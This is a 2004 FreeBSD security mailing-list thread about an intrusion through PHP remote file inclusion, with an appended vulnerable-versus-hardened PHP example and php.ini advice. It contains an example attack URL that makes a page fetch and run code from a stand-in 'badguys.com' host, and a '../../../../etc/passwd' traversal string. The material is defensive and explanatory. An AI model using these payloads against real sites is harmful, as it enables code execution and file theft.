Re: FreeBSD-SA-04:13.linux in the wild

From: Gustavo A. Baratto (gbaratto@superb.net)
Date: Wed Aug 11 2004 - 16:23:58 CDT


I think I may have seen such a thing before as well... not a FreeBSD problem
though... It's PHP's own fault.
PHP comes with url_fopen enabled by default, so if someone writes a
script.php with something like:
include ("$var");

One could call the
http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt

the text of malicious_script.php hosted remotely would be included in
script.php, and any arbitrary code would be executed with www privileges.

Just disabling url_fopen in php.ini would prevent that.

If this is not what you have seen, please, I'd like to know more about it.

Thank you ;)

----- Original Message -----
From: "Ryan Thompson" <ryan@sasknow.com>
To: <freebsd-security@freebsd.org>
Sent: Wednesday, August 11, 2004 2:07 PM
Subject: FreeBSD-SA-04:13.linux in the wild

>
> Has anyone else seen this in the wild?
>
> We just had an attempted attack yesterday from a live attacker on one of
> our machines using this vulnerability. It wasn't all that clever, and
> they're long gone, but I *did* manage to catch them in the act and grab
> a copy of the binary they tried to run from /tmp/, as well as the PHP
> injection code they used to subvert a virtual web site's poorly-written
> index.php script to execute commands as a local user.
>
> Their first order of business was uname -a, and the timing of the
> requests appeared to be random and experimental ("cd /tmp; ls -la", a
> few times). If any FreeBSD.org developers would like more information,
> I'd be happy to share my findings and log output off-list.
>
> - Ryan
>
> --
> Ryan Thompson <ryan@sasknow.com>
>
> SaskNow Technologies - http://www.sasknow.com
> 901-1st Avenue North - Saskatoon, SK - S7K 1Y4
>
> Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon
> Toll-Free: 877-727-5669 (877-SASKNOW) North America
> _______________________________________________
> freebsd-security@freebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to
> "freebsd-security-unsubscribe@freebsd.org"
>

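The include("$var") pattern discussed in the reply above, as an added example that is not code from either poster: the vulnerable handler beside a hardened version that treats the request parameter as a key into an allow-list of local files rather than as a path. PAGE_DIR, the PAGES table and the parameter name var are assumptions chosen for illustration; the code targets PHP 7 or later.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original posts. It shows the
// include("$var") pattern from the thread next to a hardened version.
// PAGE_DIR, PAGES and the 'var' parameter name are assumptions.

// ---- Vulnerable form -------------------------------------------------
// Whatever arrives in ?var= is handed straight to include(). With the URL
// wrappers enabled, ?var=http://badguys.com/malicious_script.txt fetches
// the remote text and executes it as the web server user.
function render_vulnerable(array $get): void
{
    $var = $get['var'] ?? 'home.php';
    include ($var);   // remote (or local) file inclusion when $var is attacker-controlled
}

// ---- Hardened form ---------------------------------------------------
// User input is never used as a path. The request parameter is a key into
// a fixed allow-list, and the resolved file must live inside PAGE_DIR.
const PAGE_DIR = __DIR__ . '/pages';   // assumption: where the site's page fragments live
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path of the page to include, or null if the request
// must be refused: URLs, traversal strings, unknown keys and missing files
// all come back as null.
function resolve_page(string $name): ?string
{
    if (!isset(PAGES[$name])) {
        return null;                       // not an allow-list key: refuse, never guess
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$name]);
    if ($base === false || $path === false) {
        return null;                       // directory or file does not exist
    }
    // Even an allow-listed entry must resolve under PAGE_DIR, which guards
    // against a symlink planted in the pages directory.
    if (strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_hardened(array $get): void
{
    $path = resolve_page((string) ($get['var'] ?? 'home'));
    if ($path === null) {
        http_response_code(404);
        echo "No such page\n";
        return;
    }
    include $path;
}

// ---- Demonstration with constructed requests (no network needed) -----
// The attack URL from the thread and a classic traversal string are both
// refused before include() is ever reached; only an allow-list key that
// maps to an existing file under PAGE_DIR resolves to a path.
var_dump(resolve_page('http://badguys.com/malicious_script.txt'));  // refused: not an allow-list key
var_dump(resolve_page('../../../../etc/passwd'));                    // refused: not an allow-list key
var_dump(resolve_page('home'));  // a path only if pages/home.php exists on disk
```

On the php.ini side, allow_url_fopen = Off is the switch the reply recommends and, in the PHP 4 era of this thread, it was the single setting that also governed include() of URLs. PHP 5.2 and later split this into a separate allow_url_include directive (Off by default), which is the one that matters for include/require; allow_url_fopen can then stay On for file_get_contents() and similar calls. Neither switch does anything about local file inclusion (?var=../../../../etc/passwd, or a log file the attacker has seeded with PHP), which is why the allow-list in the hardened form, not the ini setting, is the real fix.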